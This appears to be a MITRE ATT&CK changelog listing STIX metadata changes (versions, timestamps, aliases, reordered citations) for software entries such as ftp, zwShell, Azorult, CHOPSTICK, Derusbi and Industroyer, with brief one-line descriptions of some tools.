external_references{'source_name': 'Novetta Winnti April 2015', 'description': 'Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.', 'url': 'http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf'}

[S0095] ftp

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[FTP](https://attack.mitre.org/software/S0095) is a utility t1[ftp](https://attack.mitre.org/software/S0095) is a utility 
>commonly available with operating systems to transfer inform>commonly available with operating systems to transfer inform
>ation over the File Transfer Protocol (FTP). Adversaries can>ation over the File Transfer Protocol (FTP). Adversaries can
> use it to transfer other tools onto a system or to exfiltra> use it to transfer other tools onto a system or to exfiltra
>te data. (Citation: Wikipedia FTP)>te data.(Citation: Microsoft FTP)(Citation: Linux FTP)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:25:40.125000+00:002022-03-07 22:20:18.809000+00:00
nameFTPftp
description[FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)[ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP)
external_references[1]['source_name']Wikipedia FTPMicrosoft FTP
external_references[1]['description']Wikipedia. (2016, June 15). File Transfer Protocol. Retrieved July 20, 2016.Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022.
external_references[1]['url']https://en.wikipedia.org/wiki/File_Transfer_Protocolhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp
x_mitre_aliases[0]FTPftp
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Linux FTP', 'description': 'N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.', 'url': 'https://linux.die.net/man/1/ftp'}

[S0350] zwShell

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[zwShell](https://attack.mitre.org/software/S0350) is a remot1[zwShell](https://attack.mitre.org/software/S0350) is a remo
>te access tool (RAT) written in Delphi that has been used by>te access tool (RAT) written in Delphi that has been seen in
> [Night Dragon](https://attack.mitre.org/groups/G0014).(Cita> the wild since the spring of 2010 and used by threat actors
>tion: McAfee Night Dragon)> during [Night Dragon](https://attack.mitre.org/campaigns/C0
 >002).(Citation: McAfee Night Dragon)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-16 15:50:05.015000+00:002022-09-22 00:38:34.857000+00:00
description[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon)
x_mitre_version1.12.0
Minor Version Changes

[S0073] ASPXSpy

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 14:48:21.994000+00:002022-09-22 20:56:06.265000+00:00
x_mitre_version1.11.2

[S0552] AdFind

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-29 18:04:33.254000+00:002022-09-29 20:40:24.739000+00:00
external_references[1]['url']https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
external_references[2]['source_name']FireEye FIN6 Apr 2019FireEye Ryuk and Trickbot January 2019
external_references[2]['description']McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.htmlhttps://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
external_references[3]['source_name']FireEye Ryuk and Trickbot January 2019FireEye FIN6 Apr 2019
external_references[3]['description']Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.htmlhttps://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
x_mitre_version1.01.1

[S0584] AppleJeus

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 20:49:10.831000+00:002022-09-28 17:46:18.677000+00:00
x_mitre_version1.01.1

[S0622] AppleSeed

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 23:17:58.410000+00:002022-03-15 20:08:18.786000+00:00
x_mitre_version1.01.1

[S0099] Arp

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[Arp](https://attack.mitre.org/software/S0099) displays infot1[Arp](https://attack.mitre.org/software/S0099) displays and 
>rmation about a system's Address Resolution Protocol (ARP) c>modifies information about a system's Address Resolution Pro
>ache. (Citation: TechNet Arp)>tocol (ARP) cache. (Citation: TechNet Arp)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002021-12-07 18:27:04.603000+00:00
description[Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)
x_mitre_version1.01.1

[S0344] Azorult

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 14:56:50.733000+00:002022-10-13 17:42:52.174000+00:00
external_references[2]['source_name']Unit42 Azorult Nov 2018Proofpoint Azorult July 2018
external_references[2]['description']Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.
external_references[2]['url']https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside
external_references[3]['source_name']Proofpoint Azorult July 2018Unit42 Azorult Nov 2018
external_references[3]['description']Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.
external_references[3]['url']https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongsidehttps://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/
x_mitre_version1.21.3

[S0190] BITSAdmin

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:09:11.516000+00:002022-10-13 18:56:28.568000+00:00
x_mitre_version1.21.3

[S0534] Bazar

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 19:43:00.355000+00:002022-09-29 20:41:20.065000+00:00
external_references[1]['source_name']KEGTAPTeam9
external_references[1]['description'](Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020)(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
external_references[2]['source_name']Team9KEGTAP
external_references[2]['description'](Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020)
external_references[5]['source_name']CrowdStrike Wizard Spider October 2020NCC Group Team9 June 2020
external_references[5]['description']Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.
external_references[5]['url']https://www.crowdstrike.com/blog/wizard-spider-adversary-update/https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
external_references[6]['source_name']NCC Group Team9 June 2020CrowdStrike Wizard Spider October 2020
external_references[6]['description']Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[6]['url']https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
x_mitre_version1.11.2

[S0252] Brave Prince

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-04-21 23:09:30.781000+00:002022-04-11 21:44:52.220000+00:00
x_mitre_version1.11.2

[S0023] CHOPSTICK

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:21:18.086000+00:002022-04-14 17:21:52.879000+00:00
external_references[1]['source_name']CHOPSTICKSPLM
external_references[1]['description'](Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017)(Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017)
external_references[2]['source_name']Backdoor.SofacyXXagent
external_references[2]['description'](Citation: Symantec APT28 Oct 2018)(Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017)
external_references[3]['source_name']SPLMX-Agent
external_references[4]['source_name']Xagentwebhp
external_references[4]['description'](Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017)(Citation: FireEye APT28 January 2017)
external_references[5]['source_name']X-AgentCHOPSTICK
external_references[5]['description'](Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017)(Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017)
external_references[6]['source_name']webhpBackdoor.SofacyX
external_references[6]['description'](Citation: FireEye APT28 January 2017)(Citation: Symantec APT28 Oct 2018)
external_references[7]['source_name']FireEye APT28ESET Sednit Part 2
external_references[7]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
external_references[7]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttp://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
external_references[8]['source_name']ESET Sednit Part 2FireEye APT28 January 2017
external_references[8]['description']ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[8]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[9]['source_name']FireEye APT28 January 2017FireEye APT28
external_references[9]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[9]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
x_mitre_version2.12.2

[S0126] ComRAT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-23 19:34:12.017000+00:002022-10-18 21:58:12.936000+00:00
external_references[1]['source_name']Symantec WaterbugESET ComRAT May 2020
external_references[1]['description']Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
external_references[1]['url']https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
external_references[3]['source_name']ESET ComRAT May 2020Symantec Waterbug
external_references[3]['description']Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.
external_references[3]['url']https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdfhttps://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1
x_mitre_version1.21.3

[S0614] CostaBricks

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 23:10:53.785000+00:002022-10-05 16:34:18.865000+00:00
x_mitre_version1.01.1

[S0115] Crimson

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 18:54:53.268000+00:002022-09-22 18:16:11.378000+00:00
external_references[2]['source_name']Proofpoint Operation Transparent Tribe March 2016Kaspersky Transparent Tribe August 2020
external_references[2]['description']Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.
external_references[2]['url']https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdfhttps://securelist.com/transparent-tribe-part-1/98127/
external_references[3]['source_name']Kaspersky Transparent Tribe August 2020Proofpoint Operation Transparent Tribe March 2016
external_references[3]['description']Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
external_references[3]['url']https://securelist.com/transparent-tribe-part-1/98127/https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
x_mitre_version1.21.3

[S0021] Derusbi

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Derusbi](https://attack.mitre.org/software/S0021) is malwart1[Derusbi](https://attack.mitre.org/software/S0021) is malwar
>e used by multiple Chinese APT groups. (Citation: Novetta-Ax>e used by multiple Chinese APT groups.(Citation: Novetta-Axi
>iom) (Citation: ThreatConnect Anthem) Both Windows and Linux>om)(Citation: ThreatConnect Anthem) Both Windows and Linux v
> variants have been observed. (Citation: Fidelis Turbo)>ariants have been observed.(Citation: Fidelis Turbo)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:59:10.146000+00:002022-04-15 15:04:10.654000+00:00
description[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo)
external_references[1]['source_name']DerusbiPHOTO
external_references[1]['description'](Citation: Novetta-Axiom)(Citation: FireEye Periscope March 2018)
external_references[2]['source_name']PHOTODerusbi
external_references[2]['description'](Citation: FireEye Periscope March 2018)(Citation: Novetta-Axiom)
external_references[3]['source_name']Novetta-AxiomFidelis Turbo
external_references[3]['description']Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.
external_references[3]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf
external_references[4]['source_name']ThreatConnect AnthemFireEye Periscope March 2018
external_references[4]['description']ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
external_references[4]['url']https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
external_references[5]['source_name']Fidelis TurboNovetta-Axiom
external_references[5]['description']Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.
external_references[5]['url']https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdfhttp://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
external_references[6]['source_name']FireEye Periscope March 2018ThreatConnect Anthem
external_references[6]['description']FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
external_references[6]['url']https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.htmlhttps://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/
x_mitre_version1.11.2

[S0567] Dtrack

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 00:05:45.283000+00:002022-10-18 22:01:45.646000+00:00
external_references[1]['source_name']Kaspersky DtrackZDNet Dtrack
external_references[1]['description']Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021.
external_references[1]['url']https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centershttps://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/
external_references[2]['source_name']Securelist DtrackDragos WASSONITE
external_references[2]['description']Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.
external_references[2]['url']https://securelist.com/my-name-is-dtrack/93338/https://www.dragos.com/threat/wassonite/
external_references[3]['source_name']Dragos WASSONITECyberBit Dtrack
external_references[3]['description']Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.
external_references[3]['url']https://www.dragos.com/threat/wassonite/https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/
external_references[4]['source_name']CyberBit DtrackKaspersky Dtrack
external_references[4]['description']Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.
external_references[4]['url']https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers
external_references[5]['source_name']ZDNet DtrackSecurelist Dtrack
external_references[5]['description']Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021.Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.
external_references[5]['url']https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/https://securelist.com/my-name-is-dtrack/93338/
x_mitre_version1.01.1

[S0182] FinFisher

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:32:08.360000+00:002022-03-02 15:47:13.329000+00:00
x_mitre_version1.31.4

[S0381] FlawedAmmyy

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 23:52:23.647000+00:002022-07-18 15:59:26.387000+00:00
x_mitre_version1.11.2

[S0249] Gold Dragon

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-04-21 23:09:31.063000+00:002022-04-11 21:45:35.889000+00:00
x_mitre_version1.11.2

[S0477] Goopy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-29 21:37:55.776000+00:002022-07-11 20:35:28.082000+00:00
x_mitre_version1.01.1

[S0632] GrimAgent

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 16:15:20.371000+00:002022-07-29 19:44:21.016000+00:00
x_mitre_version1.01.1

[S0009] Hikit

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-09 18:59:27.117000+00:002022-01-12 16:21:44.692000+00:00
x_mitre_version1.21.3

[S0398] HyperBro

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 19:21:39.068000+00:002021-11-29 21:48:51.029000+00:00
x_mitre_version1.11.2

[S0357] Impacket

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-07 16:02:38.320000+00:002022-09-27 18:20:48.473000+00:00
x_mitre_version1.21.3

[S0604] Industroyer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence', 'Joe Slowik - Dragos']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 19:33:41.189000+00:002022-10-20 20:37:50.556000+00:00
external_references[3]['url']https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
external_references[4]['url']https://dragos.com/blog/crashoverride/CrashOverride-01.pdf https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
